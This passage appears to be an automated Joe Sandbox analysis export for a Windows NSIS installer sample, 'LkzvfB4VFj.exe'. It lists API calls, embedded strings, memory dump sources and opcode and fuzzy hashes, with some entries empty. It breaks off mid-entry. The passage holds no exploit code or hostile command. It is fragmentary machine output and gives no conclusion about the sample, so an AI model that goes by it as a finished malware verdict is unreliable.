                                                  • String ID: "$"C:\Users\user\Desktop\LkzvfB4VFj.exe"$.tmp$1033$Aftopningen Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\LkzvfB4VFj.exe$C:\Users\user\tranchet$C:\Users\user\tranchet\Trykmaalere$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 3776617018-3347189085
                                                  • Opcode ID: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                  • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                  • Opcode Fuzzy Hash: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                  • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                  APIs
                                                    • Part of subcall function 6FEB1215: GlobalAlloc.KERNELBASE(00000040,6FEB1233,?,6FEB12CF,-6FEB404B,6FEB11AB,-000000A0), ref: 6FEB121D
                                                  • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 6FEB1BC4
                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 6FEB1C0C
                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 6FEB1C16
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB1C29
                                                  • GlobalFree.KERNEL32(?), ref: 6FEB1D09
                                                  • GlobalFree.KERNEL32(?), ref: 6FEB1D0E
                                                  • GlobalFree.KERNEL32(?), ref: 6FEB1D13
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB1EFA
                                                  • lstrcpyA.KERNEL32(?,?), ref: 6FEB2098
                                                  • GetModuleHandleA.KERNEL32(00000008), ref: 6FEB2114
                                                  • LoadLibraryA.KERNEL32(00000008), ref: 6FEB2125
                                                  • GetProcAddress.KERNEL32(?,?), ref: 6FEB217E
                                                  • lstrlenA.KERNEL32(00000408), ref: 6FEB2198
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                   • Associated: 00000000.00000002.92789161524.000000006FEB0000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000000.00000002.92789295698.000000006FEB3000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000000.00000002.92789366643.000000006FEB5000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                  • String ID:
                                                  • API String ID: 245916457-0
                                                  • Opcode ID: c53ad765e7b65e8d7aec757007b1ab9d1272fbdb33c1f3429521f3abc85dd1d9
                                                  • Instruction ID: abfde3e4fb01bb4ab50bc2712e1331edc0fa31e8484f623e0824d5ad0510851b
                                                  • Opcode Fuzzy Hash: c53ad765e7b65e8d7aec757007b1ab9d1272fbdb33c1f3429521f3abc85dd1d9
                                                  • Instruction Fuzzy Hash: FB229D7194460ADEDB118FF88B847EDBFF1BF06329F30462ED1A1A6280D7786582CB51

                                                   Control-flow Graph: function starting at 004058BF (graph image not reproduced)
                                                  APIs
                                                  • DeleteFileA.KERNELBASE(?,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                  • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                  • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                  • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                  • FindFirstFileA.KERNELBASE(0042B898,?,?,?,0040A014,?,0042B898,?,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                  • FindClose.KERNEL32(00000000), ref: 00405A26
                                                  Strings
                                                  • "C:\Users\user\Desktop\LkzvfB4VFj.exe", xrefs: 004058BF
                                                  • \*.*, xrefs: 0040592A
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\LkzvfB4VFj.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-3804905780
                                                  • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                  • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                  • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                  • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                  APIs
                                                  • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                  Strings
                                                  • C:\Users\user\tranchet\Trykmaalere, xrefs: 00402230
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID: C:\Users\user\tranchet\Trykmaalere
                                                  • API String ID: 123533781-2736763094
                                                  • Opcode ID: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                  • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                  • Opcode Fuzzy Hash: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                  • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(75843410,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,75843410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75843410,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                  • FindClose.KERNELBASE(00000000), ref: 00406482
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                  • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                  • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                  • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 004027B0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                  • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                  • Opcode Fuzzy Hash: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                  • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A

                                                   Control-flow Graph: function starting at 0040390A (graph image not reproduced)
                                                  APIs
                                                    • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                    • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                  • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75843410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\LkzvfB4VFj.exe",00000000), ref: 00403985
                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75843410), ref: 004039FA
                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                  • GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                    • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                  • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                  • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                  • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                  • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\LkzvfB4VFj.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\tranchet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                  • API String ID: 1975747703-2813313323
                                                  • Opcode ID: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                  • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                  • Opcode Fuzzy Hash: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                  • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D

                                                   Control-flow Graph: function starting at 00402EA1 (graph image not reproduced)
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402EB2
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\LkzvfB4VFj.exe,00000400), ref: 00402ECE
                                                    • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\LkzvfB4VFj.exe,80000000,00000003), ref: 00405C94
                                                    • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                  • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\LkzvfB4VFj.exe,C:\Users\user\Desktop\LkzvfB4VFj.exe,80000000,00000003), ref: 00402F1A
                                                  • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                   • String ID: "C:\Users\user\Desktop\LkzvfB4VFj.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\LkzvfB4VFj.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error$Null$soft
                                                  • API String ID: 2803837635-817629889
                                                  • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                  • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                  • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                  • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D

                                                   Control-flow Graph: function starting at 0040618A (graph image not reproduced)
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004062B5
                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                  • SHGetSpecialFolderLocation.SHELL32(00405256,758423A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                  • SHGetPathFromIDListA.SHELL32(758423A0,Call), ref: 00406312
                                                  • CoTaskMemFree.OLE32(758423A0), ref: 0040631E
                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                  • lstrlenA.KERNEL32(Call,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00424248,758423A0), ref: 00406394
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 717251189-1230650788
                                                  • Opcode ID: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                  • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                  • Opcode Fuzzy Hash: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                  • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E

                                                  Control-flow Graph (rendered graph not recoverable from the export)
                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 00401798
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 004017C2
                                                    • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Aftopningen Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                    • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,758423A0), ref: 0040527A
                                                    • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsi9279.tmp$C:\Users\user\AppData\Local\Temp\nsi9279.tmp\System.dll$C:\Users\user\tranchet\Trykmaalere$Call
                                                  • API String ID: 1941528284-2295437664
                                                  • Opcode ID: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                  • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                  • Opcode Fuzzy Hash: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                  • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D

                                                  Control-flow Graph (rendered graph not recoverable from the export)
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: ... %d%%$HBB
                                                  • API String ID: 551687249-372310663
                                                  • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                  • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                  • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                  • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD

                                                  Control-flow Graph

                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E38
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                  • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID: Calibri
                                                  • API String ID: 3808545654-1409258342
                                                  • Opcode ID: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                  • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                  • Opcode Fuzzy Hash: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                  • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C

                                                  Control-flow Graph (rendered graph not recoverable from the export)
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                  • GetLastError.KERNEL32 ref: 0040573B
                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                  • GetLastError.KERNEL32 ref: 0040575A
                                                  Strings
                                                  • C:\Users\user\Desktop, xrefs: 004056E4
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                  • API String ID: 3449924974-26219170
                                                  • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                  • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                  • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                  • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9

                                                  Control-flow Graph (rendered graph not recoverable from the export)
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                  • wsprintfA.USER32 ref: 004064E2
                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME$\
                                                  • API String ID: 2200240437-4240819195
                                                  • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                  • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                  • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                  • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D

                                                  Control-flow Graph (rendered graph not recoverable from the export)
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405CD3
                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                  Strings
                                                  • nsa, xrefs: 00405CCA
